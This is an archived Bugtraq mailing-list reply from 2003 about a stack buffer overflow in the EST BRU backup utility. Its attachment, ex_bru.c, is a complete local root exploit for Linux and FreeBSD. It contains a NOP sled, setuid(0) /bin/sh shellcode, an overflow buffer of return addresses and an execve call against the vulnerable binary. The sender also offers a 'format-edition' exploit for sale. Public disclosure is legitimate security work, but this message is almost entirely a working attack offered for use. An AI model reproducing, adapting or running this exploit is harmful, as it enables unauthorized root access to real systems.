[30811] in bugtraq
Re: SRT2003-07-16-0358 - bru has buffer overflow and format issues
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Knud_Erik_H=F8jgaar)
Fri Jul 18 17:28:24 2003
Message-ID: <002201c34d71$58ba3f70$24029dd9@tuborg>
From: =?iso-8859-1?Q?Knud_Erik_H=F8jgaard?= <kain@ircop.dk>
To: "KF" <dotslash@snosoft.com>, "bugtraq" <bugtraq@securityfocus.com>
Date: Fri, 18 Jul 2003 23:12:40 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_001B_01C34D82.15BB4EB0"
------=_NextPart_000_001B_01C34D82.15BB4EB0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
KF wrote:
[snip]
>> High Level Description : bru has buffer overflow and format issues
[snip]
contact sales@snosoft.com for format-edition, free buffer-linux/freebsd
edition attached.
--
kokanin
------=_NextPart_000_001B_01C34D82.15BB4EB0
Content-Type: application/octet-stream;
name="ex_bru.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="ex_bru.c"
/** EST BRU(TM) Backup and Restore Utility Local Root Exploit
**
** By: Dvdman@l33tsecurity.com
**
** Simple Stack overflow Wont say any more :P
**
** Linux & FreeBsd Targets
**
** Greetz: =
sam,flatline,v0id,#!l33tsecurity@efnet,KF,b0iler,schlumpf,kokanin,DSR
**
** Public Release=20
** L33tsecurity 2003; irc.secsup.org #l33tsecurity=20
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/errno.h>
#define FUN "./bru"
char shellcode[] =3D
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* SETUID(0) SHELLCODE LINUX */
"\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"
"\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
unsigned long sp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char **argv) {
char buffer[9000];
int x,target; =20
char *env[2];
char *args[24];
=20
unsigned long ret =3D 0xbffffffa - strlen(shellcode) - strlen(FUN);
int *ptr =3D (int *)(buffer);
if (argc !=3D 2) { =20
usage();
exit(0);
}
target =3D atoi(argv[1]);
=20
if (target =3D=3D 0) {
for (x=3D0; x<9000 ; x+=3D4)
*ptr++ =3D (ret + 1);
}
if (target =3D=3D 1) {
for (x=3D0; x<3500 ; x+=3D4)
*ptr++ =3D 0xbfbffe48; =20
}=20
/* put in env */
env[0] =3D shellcode;
env[1] =3D NULL;
args[0] =3D FUN;
args[1] =3D buffer;
args[2] =3D NULL;
=20
execve (args[0], args, env);
perror ("execve");
}
int usage() {
printf("EST BRU(TM)local root exploit\n");
printf("By: Dvdman@l33tsecurity.com\n");
printf("Usage: ./ex_bru target\n");
printf("TARGET LIST:\n");
printf("0. LINUX\n1. FREEBSD\n");
return 0;
}
------=_NextPart_000_001B_01C34D82.15BB4EB0--
